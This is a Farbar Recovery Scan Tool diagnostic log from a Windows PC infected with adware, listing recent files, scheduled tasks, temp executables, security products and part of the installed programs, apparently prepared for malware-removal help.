2015-07-14 01:51 - 2015-07-25 11:20 - 00003112 _____ C:\Windows\Tasks\35aa6d8e-8d62-46d5-85c6-1ba7c9408914-1-7.job
2015-07-14 01:51 - 2015-07-25 11:20 - 00002420 _____ C:\Windows\Tasks\35aa6d8e-8d62-46d5-85c6-1ba7c9408914-5.job
2015-07-14 01:50 - 2015-07-25 14:11 - 00000000 ____D C:\Program Files\SavePass 1.1
2015-07-14 01:50 - 2015-07-25 13:35 - 00005492 _____ C:\Windows\Tasks\35aa6d8e-8d62-46d5-85c6-1ba7c9408914-6.job
2015-07-14 01:50 - 2015-07-25 12:50 - 00002086 _____ C:\Windows\Tasks\35aa6d8e-8d62-46d5-85c6-1ba7c9408914-10_user.job
2015-07-14 01:50 - 2015-07-25 11:20 - 00005156 _____ C:\Windows\Tasks\35aa6d8e-8d62-46d5-85c6-1ba7c9408914-7.job
2015-07-14 01:50 - 2015-07-25 11:20 - 00004814 _____ C:\Windows\Tasks\35aa6d8e-8d62-46d5-85c6-1ba7c9408914-11.job
2015-07-14 01:50 - 2015-07-25 11:20 - 00004132 _____ C:\Windows\Tasks\35aa6d8e-8d62-46d5-85c6-1ba7c9408914-3.job
2015-07-14 01:50 - 2015-07-14 16:40 - 00000000 ____D C:\Program Files\141eff10-cc51-461a-a429-b050fca21181
2015-07-14 01:42 - 2015-07-25 11:41 - 00000000 ____D C:\ProgramData\9201185608438035577
2015-07-14 01:42 - 2015-07-14 02:11 - 00000000 ____D C:\Program Files\CuuttThEPriucce
2015-07-14 01:41 - 2015-07-14 01:41 - 00000000 ____D C:\ProgramData\lojdkkabciignnppakcahhgihclijfid
2015-07-14 01:40 - 2015-07-25 21:57 - 00000000 ____D C:\Users\Cukwenk\AppData\Local\CD674440-1436838005-11E1-8EA2-047D7BFA1DE9
2015-07-14 01:39 - 2015-07-25 21:57 - 00000000 ____D C:\Users\Cukwenk\AppData\Roaming\CD674440-1436881159-11E1-8EA2-047D7BFA1DE9
2015-07-14 01:38 - 2015-07-25 13:41 - 00000000 ____D C:\Program Files\See Results Hub
2015-07-14 01:38 - 2015-07-25 12:48 - 00000000 ____D C:\ProgramData\3a65b31f-fd78-451b-b99b-7557d173b95d
2015-07-14 01:38 - 2015-07-25 12:48 - 00000000 ____D C:\Program Files\Common Files\3a65b31f-fd78-451b-b99b-7557d173b95d
2015-07-14 01:36 - 2015-07-25 12:20 - 00000000 ____D C:\ProgramData\{c9a57a36-327b-fad7-c9a5-57a36327e8d8}
2015-07-14 01:36 - 2015-07-25 07:36 - 00000328 _____ C:\Windows\Tasks\TuneInPro.job
2015-07-14 01:27 - 2015-07-14 01:27 - 00000000 ____D C:\ProgramData\Sun
2015-07-14 01:27 - 2015-07-14 01:27 - 00000000 ____D C:\Program Files\Common Files\Java
2015-07-14 01:27 - 2015-07-14 01:26 - 00096680 _____ (Oracle Corporation) C:\Windows\system32\WindowsAccessBridge.dll
2015-07-14 01:26 - 2015-07-25 21:57 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Java
2015-07-14 01:26 - 2015-07-14 01:27 - 00000000 ____D C:\ProgramData\Oracle
2015-07-14 01:25 - 2015-07-14 01:25 - 00000000 ____D C:\Program Files\Java
2015-07-14 01:08 - 2015-07-14 01:09 - 00000000 ____D C:\Users\Cukwenk\AppData\Local\Chromium
2015-07-14 01:06 - 2015-07-14 12:29 - 00000000 ____D C:\Users\Cukwenk\AppData\Local\{8550B30C-A1F8-DFB4-CC60-FA5CE80806C4}
2015-07-14 01:06 - 2015-07-14 12:06 - 00000278 _____ C:\Windows\Tasks\Run_Dregol.job
2015-07-14 01:06 - 2015-07-14 01:06 - 00000000 ____D C:\ProgramData\{9A2272E1-CAA0-A367-7B26-D3E5ABA4006B}
2015-07-14 01:05 - 2015-07-25 13:41 - 00000000 ____D C:\Program Files\Jungle Net
2015-07-14 01:05 - 2015-07-25 12:48 - 00000000 ____D C:\ProgramData\31f7a620-acbd-4f84-82db-5e231b8ad5de
2015-07-14 01:05 - 2015-07-25 12:48 - 00000000 ____D C:\Program Files\Common Files\31f7a620-acbd-4f84-82db-5e231b8ad5de
2015-07-13 17:46 - 2015-07-13 17:46 - 00613255 _____ (CMI Limited) C:\Users\Cukwenk\AppData\Local\nsm83E0.tmp
2015-07-13 17:41 - 2015-07-13 17:41 - 00000000 ____D C:\Windows\system32\appmgmt
2015-07-13 17:37 - 2015-07-25 11:37 - 00002404 _____ C:\Windows\Tasks\aec13a97-93b2-4738-96e9-978ab384cb13-5_user.job
2015-07-13 17:37 - 2015-07-25 11:37 - 00002404 _____ C:\Windows\Tasks\aec13a97-93b2-4738-96e9-978ab384cb13-5.job
2015-07-13 17:37 - 2015-07-13 17:37 - 00613255 _____ (CMI Limited) C:\Users\Cukwenk\AppData\Local\nsj317A.tmp
2015-07-13 17:36 - 2015-07-25 13:35 - 00003096 _____ C:\Windows\Tasks\aec13a97-93b2-4738-96e9-978ab384cb13-1-6.job
2015-07-13 17:36 - 2015-07-25 12:36 - 00005476 _____ C:\Windows\Tasks\aec13a97-93b2-4738-96e9-978ab384cb13-6.job
2015-07-13 17:36 - 2015-07-25 11:36 - 00005140 _____ C:\Windows\Tasks\aec13a97-93b2-4738-96e9-978ab384cb13-7.job
2015-07-13 17:36 - 2015-07-25 11:36 - 00004798 _____ C:\Windows\Tasks\aec13a97-93b2-4738-96e9-978ab384cb13-11.job
2015-07-13 17:36 - 2015-07-25 11:36 - 00004452 _____ C:\Windows\Tasks\aec13a97-93b2-4738-96e9-978ab384cb13-4.job
2015-07-13 17:36 - 2015-07-25 11:36 - 00003096 _____ C:\Windows\Tasks\aec13a97-93b2-4738-96e9-978ab384cb13-1-7.job
2015-07-13 17:36 - 2015-07-14 12:19 - 00000000 ____D C:\Program Files\4200ca2f-eb59-4154-b947-6a964429984f
2015-07-13 17:35 - 2015-07-25 14:09 - 00000000 ____D C:\Program Files\GoHD
2015-07-13 17:35 - 2015-07-25 12:35 - 00002070 _____ C:\Windows\Tasks\aec13a97-93b2-4738-96e9-978ab384cb13-10_user.job
2015-07-13 17:35 - 2015-07-25 11:39 - 00004116 _____ C:\Windows\Tasks\aec13a97-93b2-4738-96e9-978ab384cb13-3.job
2015-07-12 19:07 - 2015-07-12 19:07 - 00000039 _____ C:\Windows\vbaddin.ini
2015-07-12 19:06 - 2015-07-12 19:06 - 00000162 _____ C:\Windows\ODBC.INI
2015-07-10 10:54 - 2015-07-10 10:54 - 00613255 _____ (CMI Limited) C:\Users\Cukwenk\AppData\Local\nsyC9E1.tmp
2015-07-09 22:04 - 2015-07-09 22:04 - 00613255 _____ (CMI Limited) C:\Users\Cukwenk\AppData\Local\nsd3073.tmp
2015-07-09 13:24 - 2015-07-25 21:57 - 00000000 ____D C:\Users\Cukwenk\AppData\Local\Unity
2015-07-09 10:58 - 2015-07-09 10:58 - 00000000 ____H C:\Windows\system32\Drivers\Msft_Kernel_WinUsb_01009.Wdf
2015-07-09 10:06 - 2015-07-09 10:06 - 00613255 _____ (CMI Limited) C:\Users\Cukwenk\AppData\Local\nsf60A4.tmp
2015-07-08 19:30 - 2015-07-08 19:30 - 00000000 ____D C:\Users\Cukwenk\Documents\OneNote Notebooks
2015-07-06 21:24 - 2015-07-06 21:24 - 00000000 ____H C:\Windows\system32\Drivers\Msft_User_WpdMtpDr_01_09_00.Wdf
2015-07-06 20:56 - 2015-07-25 23:05 - 00000000 ____D C:\Program Files\Mozilla Firefox
2015-07-06 20:56 - 2015-07-06 20:56 - 00000000 ____D C:\Users\Cukwenk\AppData\Roaming\Mozilla
2015-07-06 20:56 - 2015-07-06 20:56 - 00000000 ____D C:\Users\Cukwenk\AppData\Local\Mozilla
2015-07-06 20:56 - 2015-07-06 20:56 - 00000000 ____D C:\ProgramData\Mozilla
2015-07-06 20:46 - 2015-07-25 21:57 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Office
2015-07-06 20:46 - 2006-10-26 19:56 - 00032592 _____ (Microsoft Corporation) C:\Windows\system32\msonpmon.dll
2015-07-06 20:44 - 2015-07-06 20:44 - 00000000 ____D C:\Program Files\Microsoft Works
2015-07-06 20:43 - 2015-07-06 20:43 - 00000000 ____D C:\Windows\PCHEALTH
2015-07-06 20:43 - 2015-07-06 20:43 - 00000000 ____D C:\Program Files\Microsoft.NET
2015-07-06 20:43 - 2015-07-06 20:43 - 00000000 ____D C:\Program Files\Microsoft Visual Studio
2015-07-06 20:43 - 2015-07-06 20:43 - 00000000 ____D C:\Program Files\Common Files\DESIGNER
2015-07-06 20:41 - 2015-07-06 20:41 - 00000000 ____D C:\Program Files\Microsoft Visual Studio 8
2015-07-06 20:40 - 2015-07-12 19:07 - 00000000 ____D C:\ProgramData\Microsoft Help
2015-07-06 20:40 - 2015-07-06 20:44 - 00000000 ____D C:\Program Files\Microsoft Office
2015-07-06 20:40 - 2015-07-06 20:40 - 00000000 ____D C:\Users\Cukwenk\AppData\Local\Microsoft Help
2015-07-06 20:13 - 2015-07-06 20:13 - 00000000 ____D C:\ProgramData\TEMP
2015-07-06 20:01 - 2015-07-06 20:00 - 00613255 _____ (CMI Limited) C:\Users\Cukwenk\AppData\Local\nsx15FE.tmp
2015-07-06 19:37 - 2015-07-06 19:37 - 00000000 ____D C:\Program Files\WinRAR
2015-07-06 17:48 - 2015-07-06 17:48 - 00613255 _____ (CMI Limited) C:\Users\Cukwenk\AppData\Local\nshA2E0.tmp
2015-07-06 15:14 - 2015-07-06 15:13 - 00613255 _____ (CMI Limited) C:\Users\Cukwenk\AppData\Local\nskB3A3.tmp
2015-07-06 15:13 - 2015-07-06 15:13 - 00000000 ____D C:\Users\Cukwenk\AppData\Roaming\Opera Software
2015-07-06 15:13 - 2015-07-06 15:13 - 00000000 ____D C:\Users\Cukwenk\AppData\Local\Opera Software
2015-07-06 15:12 - 2015-07-25 11:39 - 00001385 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Opera.lnk
2015-07-06 15:11 - 2015-07-14 18:18 - 00000000 ____D C:\Program Files\Opera
2015-07-06 11:36 - 2015-07-06 11:36 - 00613255 _____ (CMI Limited) C:\Users\Cukwenk\AppData\Local\nsd4268.tmp
2015-07-06 11:35 - 2015-07-25 14:31 - 00000000 ____D C:\Users\Cukwenk\AppData\Roaming\systweak
2015-07-06 11:35 - 2015-02-19 13:09 - 00018200 _____ () C:\Windows\system32\roboot.exe
2015-07-06 10:52 - 2015-07-25 13:35 - 00000366 _____ C:\Windows\Tasks\APSnotifierPP1.job
2015-07-06 10:52 - 2015-07-25 13:35 - 00000364 _____ C:\Windows\Tasks\APSnotifierPP3.job
2015-07-06 10:52 - 2015-07-25 13:35 - 00000364 _____ C:\Windows\Tasks\APSnotifierPP2.job
2015-07-06 10:52 - 2015-07-10 13:28 - 00000000 ____D C:\Users\Cukwenk\AppData\Roaming\Adobe
2015-07-06 10:52 - 2015-07-06 10:52 - 00000000 ____D C:\Users\Cukwenk\AppData\Roaming\Macromedia
2015-07-06 10:50 - 2015-07-06 10:50 - 00000000 ____D C:\Windows\system32\Flash
2015-07-06 10:48 - 2015-07-06 10:48 - 00613255 _____ (CMI Limited) C:\Users\Cukwenk\AppData\Local\nsv2ACF.tmp
2015-07-06 10:48 - 2015-07-06 10:48 - 00000000 __SHD C:\Users\Cukwenk\AppData\Roaming\AnyProtectEx
2015-07-06 10:25 - 2015-07-25 12:44 - 00003130 _____ C:\Windows\Tasks\7ac5c440-fd07-4e61-a049-8edfc7759672-1-6.job
2015-07-06 10:25 - 2015-07-25 11:20 - 00003466 _____ C:\Windows\Tasks\7ac5c440-fd07-4e61-a049-8edfc7759672-1-7.job
2015-07-06 10:25 - 2015-07-25 11:20 - 00002438 _____ C:\Windows\Tasks\7ac5c440-fd07-4e61-a049-8edfc7759672-5_user.job
2015-07-06 10:25 - 2015-07-25 11:20 - 00002438 _____ C:\Windows\Tasks\7ac5c440-fd07-4e61-a049-8edfc7759672-5.job
2015-07-06 10:24 - 2015-07-25 13:35 - 00002104 _____ C:\Windows\Tasks\7ac5c440-fd07-4e61-a049-8edfc7759672-10_user.job
2015-07-06 10:24 - 2015-07-25 12:48 - 00000000 ____D C:\Program Files\8eaf934f-a3a3-4a5c-bd16-610e3f752e77
2015-07-06 10:24 - 2015-07-25 12:44 - 00005510 _____ C:\Windows\Tasks\7ac5c440-fd07-4e61-a049-8edfc7759672-6.job
2015-07-06 10:24 - 2015-07-25 12:19 - 00000000 ____D C:\Program Files\CinemaPlus-3.2cV05.07
2015-07-06 10:24 - 2015-07-25 11:50 - 00000004 _____ C:\Windows\system32\029B560A371F4E00AB32838EBC01B9E7
2015-07-06 10:24 - 2015-07-25 11:20 - 00005174 _____ C:\Windows\Tasks\7ac5c440-fd07-4e61-a049-8edfc7759672-7.job
2015-07-06 10:24 - 2015-07-25 11:20 - 00004150 _____ C:\Windows\Tasks\7ac5c440-fd07-4e61-a049-8edfc7759672-3.job
2015-07-06 10:24 - 2015-07-25 11:20 - 00000962 _____ C:\Windows\Tasks\globalUpdateUpdateTaskMachineCore.job
2015-07-06 10:24 - 2015-07-25 10:45 - 00000966 _____ C:\Windows\Tasks\globalUpdateUpdateTaskMachineUA.job
2015-07-06 10:24 - 2015-07-06 10:24 - 00000000 ____D C:\Users\Cukwenk\AppData\Local\globalUpdate
2015-07-06 10:24 - 2015-07-06 10:24 - 00000000 ____D C:\Program Files\globalUpdate
2015-07-06 10:23 - 2015-07-25 13:43 - 00000000 ____D C:\Program Files\MiuiTab
2015-07-06 10:23 - 2015-07-25 11:20 - 00001048 _____ C:\Windows\Tasks\Crossbrowse.job
2015-07-06 10:23 - 2015-07-06 10:23 - 00000000 ____D C:\Users\Cukwenk\AppData\Local\Crossbrowse
2015-07-06 10:23 - 2015-07-06 10:23 - 00000000 ____D C:\ProgramData\IHProtectUpDate
2015-07-06 10:22 - 2015-07-25 21:57 - 00000000 ____D C:\Users\Cukwenk\AppData\Local\gmsd_ra_005010022
2015-07-06 10:22 - 2015-07-25 13:41 - 00000000 ____D C:\Program Files\gmsd_ra_005010022
2015-07-06 10:22 - 2015-07-25 11:20 - 00004712 _____ C:\Windows\system32\Oexufafono.ini
2015-07-06 10:22 - 2015-07-25 11:20 - 00002424 _____ C:\Windows\system32\OexufafonoOff.ini
2015-07-06 10:22 - 2015-07-06 10:22 - 00000000 _____ C:\Windows\prleth.sys
2015-07-06 10:22 - 2015-07-06 10:22 - 00000000 _____ C:\Windows\hgfs.sys
2015-07-06 10:21 - 2015-07-25 21:56 - 00000000 ____D C:\Users\Cukwenk\AppData\Roaming\mystartsearch
2015-07-06 10:21 - 2015-07-25 13:41 - 00000000 ____D C:\Program Files\shopperz
2015-07-06 10:21 - 2015-07-06 10:21 - 00000045 _____ C:\user.js
2015-07-06 10:21 - 2015-06-18 12:10 - 00056344 _____ (Cherimoya Ltd) C:\Windows\system32\Drivers\cherimoya.sys
2015-07-06 10:09 - 2009-06-10 09:39 - 00000824 _____ C:\Windows\system32\Drivers\etc\hp.bak
2015-07-06 10:08 - 2015-07-25 21:57 - 00000000 ____D C:\Users\Cukwenk\AppData\Roaming\CD674440-1436220497-11E1-8EA2-047D7BFA1DE9
2015-07-06 10:07 - 2015-07-06 10:07 - 00000000 ____D C:\Program Files\mbot_id_014010022
2015-07-01 16:48 - 2015-07-25 11:24 - 00000000 ____D C:\Users\Cukwenk\AppData\Roaming\DMCache
2015-07-01 16:48 - 2015-07-22 22:44 - 00000000 ____D C:\Users\Cukwenk\Downloads\Video
2015-07-01 16:48 - 2015-07-12 19:04 - 00000000 ____D C:\Users\Cukwenk\Downloads\Compressed
2015-07-01 16:48 - 2015-07-01 16:48 - 00000000 ____D C:\ProgramData\IDM
2015-07-01 16:47 - 2015-07-25 21:57 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\WinRAR
2015-07-01 16:47 - 2015-07-25 21:56 - 00000000 ____D C:\Users\Cukwenk\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\WinRAR
2015-07-01 16:47 - 2015-07-12 19:08 - 00001118 _____ C:\ProgramData\Microsoft\Windows\Start Menu\WinRAR.lnk
2015-07-01 16:47 - 2015-07-01 16:47 - 00000000 ____D C:\Users\Cukwenk\AppData\Roaming\WinRAR
2015-06-30 23:10 - 2015-07-26 09:24 - 00078032 _____ (Absolute Software Corp.) C:\Windows\system32\rpcnet.dll
2015-06-30 23:10 - 2015-06-30 23:09 - 00078032 ____N (Absolute Software Corp.) C:\Windows\system32\rpcnet.exe
2015-06-29 22:19 - 2015-07-25 13:33 - 00000350 _____ C:\Windows\Tasks\DriverToolkit Autorun.job
2015-06-29 18:22 - 2015-07-25 21:57 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\iTunes
2015-06-29 18:22 - 2015-07-06 21:24 - 00000000 ____D C:\Users\Cukwenk\AppData\Roaming\Apple Computer
2015-06-29 18:22 - 2015-06-29 18:22 - 00001753 _____ C:\Users\Public\Desktop\iTunes.lnk
2015-06-29 18:22 - 2015-06-29 18:22 - 00000000 ____D C:\Users\Cukwenk\AppData\Local\Apple Computer
2015-06-29 18:22 - 2015-06-29 18:22 - 00000000 ____D C:\ProgramData\B0FFCDD9-5261-4e59-B29A-17A4FABDEBAB
2015-06-29 18:22 - 2015-06-29 18:22 - 00000000 ____D C:\ProgramData\Apple Computer
2015-06-29 18:22 - 2015-06-29 18:22 - 00000000 ____D C:\Program Files\iTunes
2015-06-29 18:22 - 2015-06-29 18:22 - 00000000 ____D C:\Program Files\iPod
2015-06-29 18:22 - 2012-10-03 11:14 - 00026840 _____ (GEAR Software Inc.) C:\Windows\system32\Drivers\GEARAspiWDM.sys
2015-06-29 18:19 - 2015-06-29 18:19 - 00002519 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Apple Software Update.lnk
2015-06-29 18:19 - 2015-06-29 18:19 - 00000000 ____D C:\Users\Cukwenk\AppData\Local\Apple
2015-06-29 18:19 - 2015-06-29 18:19 - 00000000 ____D C:\Program Files\Apple Software Update
2015-06-29 18:18 - 2015-06-29 18:22 - 00000000 ____D C:\Program Files\Common Files\Apple
2015-06-29 18:18 - 2015-06-29 18:19 - 00000000 ____D C:\ProgramData\Apple
2015-06-29 18:18 - 2015-06-29 18:18 - 00000000 ____D C:\Program Files\Bonjour
2015-06-29 18:11 - 2015-07-25 12:29 - 00000000 ____D C:\Users\Cukwenk\AppData\Roaming\TuneUp Software
2015-06-29 18:11 - 2015-06-29 21:33 - 00000000 __SHD C:\ProgramData\{FE8D473A-6F06-4F99-B5F4-BED72B2A038C}
2015-06-29 18:11 - 2015-06-29 18:12 - 00000000 ____D C:\ProgramData\TuneUp Software
2015-06-29 18:11 - 2015-06-29 18:11 - 00000000 ____D C:\Users\Cukwenk\AppData\Local\TuneUp Software
2015-06-29 18:03 - 2015-02-23 23:23 - 00246920 ____N (Microsoft Corporation) C:\Windows\system32\MpSigStub.exe
2015-06-29 18:02 - 2015-07-25 21:56 - 00000000 ____D C:\Users\Cukwenk\AppData\Roaming\OpenCandy
2015-06-29 18:02 - 2015-07-25 11:54 - 00000000 ____D C:\Program Files\GRETECH
2015-06-29 18:01 - 2015-06-29 18:01 - 00000000 ____D C:\ProgramData\McAfee
2015-06-29 18:00 - 2015-07-25 12:49 - 00000000 ____D C:\Program Files\Adobe
2015-06-29 18:00 - 2015-07-16 17:40 - 00000000 ____D C:\ProgramData\Adobe
2015-06-29 18:00 - 2015-07-16 17:40 - 00000000 ____D C:\Program Files\Common Files\Adobe
2015-06-29 17:56 - 2015-07-22 21:45 - 00000000 ____D C:\Users\Cukwenk\AppData\Local\Adobe
2015-06-29 17:53 - 2015-07-25 11:24 - 00000000 ____D C:\Program Files\SMADAV
2015-06-29 17:53 - 2015-06-29 17:53 - 00000000 ____D C:\Users\Cukwenk\AppData\Roaming\Smadav
2015-06-29 17:51 - 2012-06-02 10:19 - 01933848 _____ (Microsoft Corporation) C:\Windows\system32\wuaueng.dll
2015-06-29 17:51 - 2012-06-02 10:19 - 00053784 _____ (Microsoft Corporation) C:\Windows\system32\wuauclt.exe
2015-06-29 17:51 - 2012-06-02 10:19 - 00045080 _____ (Microsoft Corporation) C:\Windows\system32\wups2.dll
2015-06-29 17:51 - 2012-06-02 10:12 - 02422272 _____ (Microsoft Corporation) C:\Windows\system32\wucltux.dll
2015-06-29 17:50 - 2012-06-02 10:19 - 00577048 _____ (Microsoft Corporation) C:\Windows\system32\wuapi.dll
2015-06-29 17:50 - 2012-06-02 10:19 - 00171904 _____ (Microsoft Corporation) C:\Windows\system32\wuwebv.dll
2015-06-29 17:50 - 2012-06-02 10:19 - 00035864 _____ (Microsoft Corporation) C:\Windows\system32\wups.dll
2015-06-29 17:50 - 2012-06-02 10:12 - 00088576 _____ (Microsoft Corporation) C:\Windows\system32\wudriver.dll
2015-06-29 17:50 - 2012-06-02 10:12 - 00033792 _____ (Microsoft Corporation) C:\Windows\system32\wuapp.exe
2015-06-29 17:49 - 2015-07-25 21:57 - 00000000 ____D C:\Users\Cukwenk\AppData\Local\Apps\2.0
2015-06-29 17:49 - 2015-07-25 14:09 - 00000000 ____D C:\Users\Cukwenk\AppData\Local\Google
2015-06-29 17:49 - 2015-06-29 17:49 - 00000000 ____D C:\Users\Cukwenk\AppData\Local\Deployment
2015-06-29 17:46 - 2015-06-29 17:46 - 00000000 ____D C:\Windows\Options
2015-06-29 17:46 - 2015-06-29 17:46 - 00000000 ____D C:\ProgramData\Atheros
2015-06-29 17:46 - 2015-06-29 17:46 - 00000000 ____D C:\Program Files\Atheros
2015-06-29 17:46 - 2012-04-19 17:54 - 02239488 _____ (Qualcomm Atheros Communications, Inc.) C:\Windows\system32\Drivers\athr.sys
2015-06-29 17:08 - 2015-06-29 17:08 - 00000000 ____D C:\Users\Cukwenk\AppData\Local\DriverToolkit

==================== One Month Modified files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2015-07-26 13:49 - 2015-06-23 14:33 - 00017920 _____ C:\Windows\system32\rpcnetp.exe
2015-07-26 09:47 - 2009-07-13 16:34 - 00014016 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2015-07-26 09:47 - 2009-07-13 16:34 - 00014016 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2015-07-26 09:27 - 2015-06-23 14:37 - 01277917 _____ C:\Windows\WindowsUpdate.log
2015-07-26 09:24 - 2009-07-13 16:53 - 00021668 _____ C:\Windows\Tasks\SCHEDLGU.TXT
2015-07-26 09:24 - 2009-07-13 16:53 - 00000006 ____H C:\Windows\Tasks\SA.DAT
2015-07-26 00:38 - 2009-07-13 14:37 - 00000000 ____D C:\Windows\registration
2015-07-26 00:37 - 2009-07-13 14:37 - 00000000 ___HD C:\Windows\system32\GroupPolicy
2015-07-26 00:21 - 2009-07-13 14:37 - 00000000 ____D C:\Windows\Microsoft.NET
2015-07-25 23:57 - 2015-06-23 15:01 - 00792708 _____ C:\Windows\system32\PerfStringBackup.INI
2015-07-25 23:12 - 2009-07-13 14:37 - 00000000 ____D C:\Windows\system32\NDF
2015-07-25 22:57 - 2009-07-13 14:37 - 00000000 ____D C:\Windows\system32\inetsrv
2015-07-25 21:57 - 2015-06-24 16:00 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\SRS Labs
2015-07-25 21:57 - 2015-06-24 15:19 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\TOSHIBA
2015-07-25 21:57 - 2015-06-24 09:34 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\DriverToolkit
2015-07-25 21:57 - 2015-06-24 08:01 - 00000000 ____D C:\Users\Cukwenk\AppData\Roaming\DRPSu
2015-07-25 21:57 - 2009-07-13 16:52 - 00000000 ___RD C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Games
2015-07-25 21:57 - 2009-07-13 16:52 - 00000000 ____D C:\Program Files\MSBuild
2015-07-25 21:57 - 2009-07-13 14:37 - 00000000 ___RD C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Maintenance
2015-07-25 21:57 - 2009-07-13 14:37 - 00000000 ___RD C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories
2015-07-25 21:56 - 2015-06-23 14:55 - 00000000 ___RD C:\Users\Cukwenk\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance
2015-07-25 21:56 - 2015-06-23 14:55 - 00000000 ___RD C:\Users\Cukwenk\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories
2015-07-25 21:56 - 2015-06-23 14:55 - 00000000 ____D C:\Users\Cukwenk
2015-07-25 12:12 - 2015-06-23 15:33 - 00000000 ____D C:\Windows\Panther
2015-07-25 12:03 - 2015-06-23 14:55 - 00000000 ____D C:\Users\Cukwenk\AppData\Local\VirtualStore
2015-07-25 11:39 - 2015-06-23 14:55 - 00001717 _____ C:\Users\Cukwenk\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk
2015-07-25 11:27 - 2009-07-13 14:37 - 00000000 ___RD C:\Users\Public
2015-07-20 16:25 - 2012-12-22 15:24 - 00000000 __SHD C:\[Smad-Cage]
2015-07-12 19:07 - 2009-07-13 14:37 - 00000000 ____D C:\Program Files\Common Files\microsoft shared
2015-07-09 06:43 - 2014-03-31 06:27 - 00048496 _____ (Absolute Software Corporation) C:\Windows\system32\identprv.dll
2015-07-06 20:43 - 2009-07-13 19:49 - 00000000 ____D C:\Windows\ShellNew
2015-07-06 20:41 - 2009-07-13 14:37 - 00000000 ____D C:\Program Files\Common Files\System
2015-07-06 20:41 - 2009-07-13 14:04 - 00000478 _____ C:\Windows\win.ini
2015-07-06 10:24 - 2015-06-24 15:42 - 00000000 ____D C:\Program Files\AmIcoSingLun
2015-07-02 13:21 - 2009-07-13 14:37 - 00000000 ____D C:\Windows\rescache
2015-06-30 04:50 - 2015-06-23 14:35 - 00017920 _____ C:\Windows\system32\rpcnetp.dll
2015-06-29 21:33 - 2015-06-24 15:48 - 00000000 ____D C:\Users\Cukwenk\AppData\Local\Downloaded Installations
2015-06-29 17:46 - 2015-06-24 15:20 - 00000000 ___HD C:\Program Files\InstallShield Installation Information
2015-06-29 17:08 - 2015-06-24 09:34 - 00000000 ____D C:\Program Files\DriverToolkit

Some files in TEMP:
====================
C:\Users\Cucuk\AppData\Local\Temp\dllnt_dump.dll
C:\Users\Cukwenk\AppData\Local\Temp\DseShExt-x86.dll
C:\Users\Cukwenk\AppData\Local\Temp\install1215124.exe
C:\Users\Cukwenk\AppData\Local\Temp\of3w84315.exe
C:\Users\Cukwenk\AppData\Local\Temp\oo2.exe
C:\Users\Cukwenk\AppData\Local\Temp\oprun10610.exe
C:\Users\Cukwenk\AppData\Local\Temp\qqpcmgr_v10.10.16434.218_72830_Silence.exe
C:\Users\Cukwenk\AppData\Local\Temp\SDShelEx-win32.dll
C:\Users\Cukwenk\AppData\Local\Temp\setup3.exe
C:\Users\Cukwenk\AppData\Local\Temp\SpOrder.dll
C:\Users\Cukwenk\AppData\Local\Temp\Uninstall.exe
C:\Users\Cukwenk\AppData\Local\Temp\z1upd92307.exe


==================== Bamital & volsnap Check =================

(There is no automatic fix for files that do not pass verification.)

C:\Windows\explorer.exe => File is digitally signed
C:\Windows\system32\winlogon.exe => File is digitally signed
C:\Windows\system32\wininit.exe => File is digitally signed
C:\Windows\system32\svchost.exe => File is digitally signed
C:\Windows\system32\services.exe => File is digitally signed
C:\Windows\system32\User32.dll => File is digitally signed
C:\Windows\system32\userinit.exe => File is digitally signed
C:\Windows\system32\rpcss.dll => File is digitally signed
C:\Windows\system32\Drivers\volsnap.sys => File is digitally signed


LastRegBack: 2015-07-25 08:18

==================== End of log ============================

 

Addition

Additional scan result of Farbar Recovery Scan Tool (x86) Version: 25-07-2015
Ran by Cucuk at 2015-07-26 15:29:41
Running from C:\Users\Cucuk\Desktop
Boot Mode: Normal
==========================================================


==================== Accounts: =============================

Administrator (S-1-5-21-3110752661-1710530649-2414096437-500 - Administrator - Disabled)
Cucuk (S-1-5-21-3110752661-1710530649-2414096437-1001 - Administrator - Enabled) => C:\Users\Cucuk
Guest (S-1-5-21-3110752661-1710530649-2414096437-501 - Limited - Disabled)

==================== Security Center ========================

(If an entry is included in the fixlist, it will be removed.)

AV: 电脑管家系统防护 (Enabled - Up to date) {6F9C3F92-B625-0E47-F0B1-447602EC65F5}
AV: Rising Antivirus (Enabled - Up to date) {DBC966C2-BD90-87CD-5A01-4DFB1D2EC867}
AS: Windows Defender (Enabled - Out of date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: 电脑管家系统防护 (Enabled - Up to date) {D4FDDE76-901F-01C9-CA01-7F04796B2F48}
AS: Rising Antivirus (Enabled - Up to date) {60A88726-9BAA-8843-60B1-768966A982DA}

==================== Installed Programs ======================

(Only the adware programs with "hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)

Adobe Flash Player 18 NPAPI (HKLM\...\Adobe Flash Player NPAPI) (Version: 18.0.0.209 - Adobe Systems Incorporated)
Adobe Reader XI (11.0.10) (HKLM\...\{AC76BA86-7AD7-1033-7B44-AB0000000001}) (Version: 11.0.10 - Adobe Systems Incorporated)
Advanced-System Protector (HKLM\...\00212D92-C5D8-4ff4-AE50-B20F0F85C40A_Systweak_Ad~9338DF9D_is1) (Version: 2.2.1000.15792 - Advanced System Protector) <==== ATTENTION
Alcor Micro USB Card Reader (HKLM\...\AmUStor) (Version: 4.3.17.00279 - Alcor Micro Corp.)
